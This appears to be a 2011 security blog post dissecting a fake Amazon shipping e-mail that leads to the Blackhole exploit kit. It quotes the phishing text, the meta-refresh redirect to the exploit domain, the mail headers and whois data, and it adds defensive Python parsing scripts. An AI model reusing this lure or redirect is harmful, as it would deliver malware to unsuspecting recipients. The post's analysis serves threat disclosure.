Blog for hpHosts, and whatever else I feel like writing about ....

Friday 9 December 2011

Blackhole exploit: For those wondering, Part 4 - Now it's Amazon's turn

This one came in whilst I was asleep. No JS MITMs this time, just the link in the e-mail, which uses a meta refresh to redirect you to the domain housing the Blackhole exploit itself:

Hello,

Shipping Confirmation
Order # 651-5411744-0155168 <http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html>

Your estimated delivery date is:
Tuesday, December 13, 2011

Track your package <http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html> Thank you for shopping with us. We thought you'd like to know that we shipped this portion of your order separately to give you quicker service. You won't be charged any extra shipping fees, and the remainder of your order will follow as soon as those items become available. If you need to return an item from this shipment or manage other orders, please visit Your Orders <http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html> on Amazon.com <http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html> .

Shipment Details

Omron WFB-387U Fat Loss Monitor, Black $129.95
Item Subtotal: $129.95
Shipping & Handling: $0.00
Total Before Tax: $129.95
Shipment Total: $129.95
Paid by Visa: $129.95

You have only been charged for the items sent in this shipment. Per our policy, you only pay for items when we ship them to you.

Returns are easy. Visit our .
If you need further assistance with your order, please visit Customer Service <http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html> .

We hope to see you again soon!
Amazon.com


<html><header><META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://certerpen.info/main.php?page=525447c096f8efbf"></header></html><!-- f851b407dc236b90d847a111101a9a44e2556d0bdbfd2bc92ce43c40 -->
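The stay.html page quoted above does nothing except bounce the visitor to certerpen.info through a meta refresh, and every link in the e-mail points at that same stay.html whatever its display text says. The following Python script is an added example, not code from this post or from hpHosts: it parses constructed copies of the e-mail's four anchors and of the quoted stay.html, reports which anchor texts name a brand their href does not belong to, and pulls the refresh target out of the landing page without fetching anything. The brand_domain parameter and the function names are the example's own.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample: just the four anchors from the quoted e-mail body,
# with their display text and href, not the complete message.
MAIL_HTML = """<p>Order # 651-5411744-0155168</p>
<a href="http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html">Track your package</a>
<a href="http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html">Your Orders</a> on
<a href="http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html">Amazon.com</a>.
<a href="http://ar.news.assyrianchurch.com/wp-content/uploads/fgallery/stay.html">Customer Service</a>"""

# The landing page (stay.html) exactly as quoted in the post; note the bogus
# <header> element in place of <head>, which browsers tolerate.
LANDING_HTML = ('<html><header><META HTTP-EQUIV="Refresh" CONTENT="0; '
                'URL=http://certerpen.info/main.php?page=525447c096f8efbf">'
                '</header></html><!-- f851b407dc236b90d847a111101a9a44e2556d0bdbfd2bc92ce43c40 -->')


def parse_refresh(content):
    """Split a Refresh value such as '0; URL=http://...' into (delay, url).

    Browsers are lenient: 'url=' may be any case, the separator may be ';' or
    ',', the URL may be quoted, and a bare delay means 'reload this page'."""
    m = re.match(r"\s*(\d+)\s*[;,]?\s*(?:url\s*=\s*)?['\"]?([^'\"]*?)['\"]?\s*$",
                 content, re.I)
    return (int(m.group(1)), m.group(2) or None) if m else None


class LinkCollector(HTMLParser):
    """Collect (anchor text, href) pairs and any <meta http-equiv=refresh> target."""

    def __init__(self):
        super().__init__()
        self.links, self.refresh = [], None
        self._href, self._text = None, []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}          # HTMLParser lower-cases names
        if tag == "a" and "href" in a:
            self._href, self._text = a["href"], []
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.refresh = parse_refresh(a.get("content", ""))

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append(("".join(self._text).strip(), self._href))
            self._href = None


def analyse(mail_html, landing_html, brand_domain="amazon.com"):
    """Where the mail's links really go, and where the landing page sends you next."""
    mail = LinkCollector()
    mail.feed(mail_html)
    hosts = sorted({urlsplit(href).hostname or "" for _, href in mail.links})
    # Anchor text that names the brand while the href points elsewhere.
    deceptive = [(text, urlsplit(href).hostname) for text, href in mail.links
                 if brand_domain in text.lower()
                 and not (urlsplit(href).hostname or "").endswith(brand_domain)]
    landing = LinkCollector()
    landing.feed(landing_html)
    delay, target = landing.refresh or (None, None)
    return {"link_hosts": hosts, "deceptive_links": deceptive,
            "refresh_delay": delay, "refresh_target": target,
            "final_host": urlsplit(target).hostname if target else None}


if __name__ == "__main__":
    print(analyse(MAIL_HTML, LANDING_HTML))
```

Keeping the refresh parsing static matters here: the target is the kit's landing URL, and the `page=` token is per-campaign, so you want it logged and blocked, not visited from an analysis box.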


Headers:

Return-Path: <revenueku82@iicbelgium.com>
Delivered-To: services@it-mate.co.uk
X-Spam-Flag: YES
X-Spam-Score: 8.476
X-Spam-Level: ********
X-Spam-Status: Yes, score=8.476 tagged_above=-9999 required=1.3
tests=[BAYES_00=-1.9, FH_FAKE_RCVD_LINE=1.778,
FORGED_MUA_OUTLOOK=1.927, FORGED_OUTLOOK_HTML=0.021,
FORGED_OUTLOOK_TAGS=0.052, HK_RANDOM_FROM=0.999, HTML_MESSAGE=0.001,
HTML_MIME_NO_HTML_TAG=0.377, HTML_NONELEMENT_30_40=0.001,
MIME_HTML_ONLY=0.723, MIME_HTML_ONLY_MULTI=0.001,
MISSING_MIMEOLE=1.899, MPART_ALT_DIFF=0.79, RCVD_DOUBLE_IP_SPAM=1.808,
SPF_PASS=-0.001] autolearn=no
Received: from mail.mdmcommercial.com (mail.mdmcommercial.com [65.212.113.54])
by mail4.emailconfig.com (Postfix) with ESMTP id 4B607398367
for <services@it-mate.co.uk>; Fri, 9 Dec 2011 14:11:08 +0000 (GMT)
Message-ID: <BIZSSKOTQKLKBTZFODELFMIHZG9SrHPOO609002tchxqbox@madhuri.com>
From: "Iris Richey" <dutgbufyflnxbf@madhuri.com>
Reply-To: "Iris Richey" <dutgbufyflnxbf@madhuri.com>
To: <services@it-mate.co.uk>
Subject: [SPAM] Your Amazon.com order of "Omron WFB-387U Fat Loss ..." has
shipped!
Date: Fri, 9 Dec 2011 09:11:38 -0500
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="-----=2974_0591_72ZQJO398Y43.28BQ175EI"
X-Priority: 3
X-MSMail-Priority: Normal
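Reading the same headers programmatically, as an added example rather than anything from the post: the script below parses a header block constructed from the headers quoted above (folded continuation lines re-indented with a leading space, the MIME body left out), compares the envelope sender with the From domain, the Subject's Amazon.com with the From domain, the Outlook Express X-Mailer with the absent X-MimeOLE (the gap SpamAssassin's MISSING_MIMEOLE rule keys on), and the first-hop relay with both sender domains, then recomputes the SpamAssassin score from the per-rule scores. Function names and the brand parameter are the example's own.

```python
import re
from email import policy
from email.parser import HeaderParser
from email.utils import parseaddr

# Constructed from the headers quoted in the post: continuation lines are
# re-indented with a leading space (the folding the extraction lost) and the
# MIME body is omitted because only the headers are examined.
RAW_HEADERS = """\
Return-Path: <revenueku82@iicbelgium.com>
Delivered-To: services@it-mate.co.uk
X-Spam-Flag: YES
X-Spam-Score: 8.476
X-Spam-Status: Yes, score=8.476 tagged_above=-9999 required=1.3
 tests=[BAYES_00=-1.9, FH_FAKE_RCVD_LINE=1.778,
 FORGED_MUA_OUTLOOK=1.927, FORGED_OUTLOOK_HTML=0.021,
 FORGED_OUTLOOK_TAGS=0.052, HK_RANDOM_FROM=0.999, HTML_MESSAGE=0.001,
 HTML_MIME_NO_HTML_TAG=0.377, HTML_NONELEMENT_30_40=0.001,
 MIME_HTML_ONLY=0.723, MIME_HTML_ONLY_MULTI=0.001,
 MISSING_MIMEOLE=1.899, MPART_ALT_DIFF=0.79, RCVD_DOUBLE_IP_SPAM=1.808,
 SPF_PASS=-0.001] autolearn=no
Received: from mail.mdmcommercial.com (mail.mdmcommercial.com [65.212.113.54])
 by mail4.emailconfig.com (Postfix) with ESMTP id 4B607398367
 for <services@it-mate.co.uk>; Fri, 9 Dec 2011 14:11:08 +0000 (GMT)
Message-ID: <BIZSSKOTQKLKBTZFODELFMIHZG9SrHPOO609002tchxqbox@madhuri.com>
From: "Iris Richey" <dutgbufyflnxbf@madhuri.com>
Reply-To: "Iris Richey" <dutgbufyflnxbf@madhuri.com>
To: <services@it-mate.co.uk>
Subject: [SPAM] Your Amazon.com order of "Omron WFB-387U Fat Loss ..." has
 shipped!
Date: Fri, 9 Dec 2011 09:11:38 -0500
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
X-Priority: 3
X-MSMail-Priority: Normal

"""


def domain_of(header_value):
    """Lower-cased domain of the first address in a From/Return-Path style value."""
    _, addr = parseaddr(str(header_value or ""))
    return addr.rpartition("@")[2].lower()


def spam_tests(status):
    """SpamAssassin rule -> score, parsed from the tests=[...] list in X-Spam-Status."""
    m = re.search(r"tests=\[(.*?)\]", status, re.S)
    return {name: float(score) for name, score in
            re.findall(r"([A-Z0-9_]+)=(-?\d+(?:\.\d+)?)", m.group(1))} if m else {}


def triage(raw_headers, brand="amazon.com"):
    """Header-only checks for a brand-impersonation phish; returns findings plus the score breakdown."""
    msg = HeaderParser(policy=policy.default).parsestr(raw_headers)
    from_dom, envelope_dom = domain_of(msg["From"]), domain_of(msg["Return-Path"])
    findings = []
    if from_dom != envelope_dom:
        findings.append(f"envelope sender {envelope_dom} differs from header From {from_dom}")
    if brand in str(msg["Subject"]).lower() and not from_dom.endswith(brand):
        findings.append(f"Subject invokes {brand} but From domain is {from_dom}")
    # Outlook Express emits X-MimeOLE alongside X-MSMail-Priority; its absence
    # is the gap SpamAssassin's MISSING_MIMEOLE rule keys on.
    if "X-MSMail-Priority" in msg and "X-MimeOLE" not in msg:
        findings.append(f"X-Mailer says {msg['X-Mailer']} but X-MimeOLE is absent")
    # First hop: "from <helo> (<rdns> [<ip>])" as Postfix writes it.
    relay = re.search(r"from\s+(\S+)\s+\(.*?\[([\d.]+)\]\)", str(msg["Received"]))
    if relay and relay.group(1).split(".", 1)[-1].lower() not in (from_dom, envelope_dom):
        findings.append(f"first hop {relay.group(1)} [{relay.group(2)}] matches neither sender domain")
    tests = spam_tests(str(msg["X-Spam-Status"]))
    return {"findings": findings, "tests": tests,
            "score_sum": round(sum(tests.values()), 3),
            "score_header": float(str(msg["X-Spam-Score"]))}


if __name__ == "__main__":
    for finding in triage(RAW_HEADERS)["findings"]:
        print("-", finding)
```

Note that SPF_PASS is a tiny negative score here precisely because SPF only vouches for the envelope domain (iicbelgium.com), which has nothing to do with either the From domain or the brand in the Subject; the envelope/From mismatch is the check that catches that.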



Host: certerpen.info
IP: 91.195.11.42
IP PTR: Resolution failed
ASN: 43479 91.195.10.0/23 UKRNIC-AS Ukrstar

No surprises as far as the ASN goes, of course:

inetnum: 91.195.10.0 - 91.195.11.255
netname: UKRSTAR-NET
descr: UkrStar ISP
descr: www.ukrstar.com
country: UA
org: ORG-UA98-RIPE
admin-c: SER50-RIPE
tech-c: WIRE88-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-lower: RIPE-NCC-END-MNT
mnt-by: UKRNIC-MNT
mnt-routes: UKRNIC-MNT
mnt-domains: UKRNIC-MNT
source: RIPE # Filtered

organisation: ORG-UA98-RIPE
org-name: UkrStar
org-type: OTHER
descr: www.ukrstar.com
address: Dal'nitskaya 46, room 404
address: Odessa 65005
address: Ukraine
phone: +380482390190
fax-no: +380482324245
e-mail: noc@ukrstar.com
admin-c: SER50-RIPE
tech-c: WIRE88-RIPE
mnt-ref: GLOBALNETWORKS-MNT
mnt-by: GLOBALNETWORKS-MNT
source: RIPE # Filtered

person: Sanin Sergey Victorovich
address: Deribasovskaya str., 12
address: Odessa 65027
address: Ukraine
phone: +380487771551
e-mail: ser-0@clan-0.com
nic-hdl: SER50-RIPE
mnt-by: GLOBALNETWORKS-MNT
source: RIPE # Filtered

person: Grigoretskiy Sergey Aalexandrovich
org: ORG-UA98-RIPE
address: Dal'nitskaya str., 46, room 404
address: Odessa 65005
address: Ukraine
phone: +380482390190
e-mail: sg@ukrstar.com
nic-hdl: WIRE88-RIPE
mnt-by: GLOBALNETWORKS-MNT
source: RIPE # Filtered

:: Information related to '91.195.10.0/23AS43479'

route: 91.195.10.0/23
descr: UKRNIC-IP-BLOCK
origin: AS43479
mnt-by: UKRNIC-MNT
source: RIPE # Filtered
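To turn a RIPE whois dump like the one above into something a script can check, here is an added example (not the post's own tooling): it parses a constructed, trimmed copy of the objects above in the RPSL "attribute: value" form RIPE prints (column padding restored, a few mnt-* lines dropped), resolves the admin-c and tech-c handles to their person objects, and confirms that 91.195.11.42 sits inside both the inetnum range and the route announced by AS43479. Function names are the example's own.

```python
import ipaddress

# Constructed, trimmed copy of the RIPE objects quoted above, in the
# "attribute:  value" form RIPE prints (column padding restored, a few mnt-*
# lines dropped). The "% Information related to" banner is how RIPE prints the
# line that appears as ":: Information related to" in the post.
WHOIS_DUMP = """\
inetnum:        91.195.10.0 - 91.195.11.255
netname:        UKRSTAR-NET
descr:          UkrStar ISP
country:        UA
org:            ORG-UA98-RIPE
admin-c:        SER50-RIPE
tech-c:         WIRE88-RIPE
status:         ASSIGNED PI
source:         RIPE # Filtered

organisation:   ORG-UA98-RIPE
org-name:       UkrStar
org-type:       OTHER
address:        Dal'nitskaya 46, room 404
address:        Odessa 65005
address:        Ukraine
e-mail:         noc@ukrstar.com
source:         RIPE # Filtered

person:         Sanin Sergey Victorovich
address:        Odessa 65027
e-mail:         ser-0@clan-0.com
nic-hdl:        SER50-RIPE
source:         RIPE # Filtered

person:         Grigoretskiy Sergey Aalexandrovich
org:            ORG-UA98-RIPE
e-mail:         sg@ukrstar.com
nic-hdl:        WIRE88-RIPE
source:         RIPE # Filtered

% Information related to '91.195.10.0/23AS43479'

route:          91.195.10.0/23
descr:          UKRNIC-IP-BLOCK
origin:         AS43479
source:         RIPE # Filtered
"""


def parse_objects(text):
    """Split RPSL-style whois output into objects.

    Each object is a dict attribute -> list of values (descr, address and
    mnt-by legitimately repeat); a blank line ends an object and '%' lines
    are server comments. End-of-line '# ...' remarks are stripped."""
    objects, current = [], {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("%"):
            if current:
                objects.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current.setdefault(key.strip(), []).append(value.split("#", 1)[0].strip())
    if current:
        objects.append(current)
    return objects


def index_by_handle(objects):
    """Look-up table: nic-hdl for persons, otherwise the object's first attribute."""
    index = {}
    for obj in objects:
        kind = next(iter(obj))
        index[obj.get("nic-hdl", obj[kind])[0]] = obj
    return index


def attribute(ip, dump):
    """Resolve an IP against the dump: range, org, origin AS and contact people."""
    objs = parse_objects(dump)
    index = index_by_handle(objs)
    addr = ipaddress.ip_address(ip)
    inetnum = next(o for o in objs if "inetnum" in o)
    lo, hi = (ipaddress.ip_address(p.strip()) for p in inetnum["inetnum"][0].split("-"))
    route = next(o for o in objs if "route" in o)
    net = ipaddress.ip_network(route["route"][0])
    contacts = {role: index[inetnum[role][0]] for role in ("admin-c", "tech-c")}
    return {
        "in_inetnum": lo <= addr <= hi,
        "netname": inetnum["netname"][0],
        "org": index[inetnum["org"][0]]["org-name"][0],
        "country": inetnum["country"][0],
        "route": str(net),
        "origin": route["origin"][0],
        "route_covers_ip": addr in net,
        "contacts": {role: f'{p["person"][0]} <{p["e-mail"][0]}>' for role, p in contacts.items()},
    }


if __name__ == "__main__":
    print(attribute("91.195.11.42", WHOIS_DUMP))
```

The same parser works on a live `whois -h whois.ripe.net 91.195.11.42` dump; the route object is the piece worth checking separately, because an abuse report goes to the inetnum contacts while a null-route or blocklist entry is keyed on the announced prefix.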


I've had a few more of the ACH ones with the JS MITMs too; this time, the domain housing the payload was:

Host: wonderfulwreath.com
IP: 46.45.137.205
IP PTR: 46-45-137-205.turkrdns.com
ASN: 42926 46.45.137.0/24 RADORE Radore Hosting Telekomunikasyon Hizmetleri San. ve Tic. Ltd. Sti.

References

Blackhole exploit: For those wondering, Part 3 - Fake Facebook e-mail
http://hphosts.blogspot.com/2011/12/blackhole-exploit-for-those-wondering_08.html

Blackhole exploit: For those wondering, Part 2
http://hphosts.blogspot.com/2011/12/blackhole-exploit-for-those-wondering_05.html

Blackhole exploit: For those wondering
http://hphosts.blogspot.com/2011/12/blackhole-exploit-for-those-wondering.html

Deobfuscate exploit kits using Malzilla
http://www.malwaredomainlist.com/forums/index.php?topic=4636
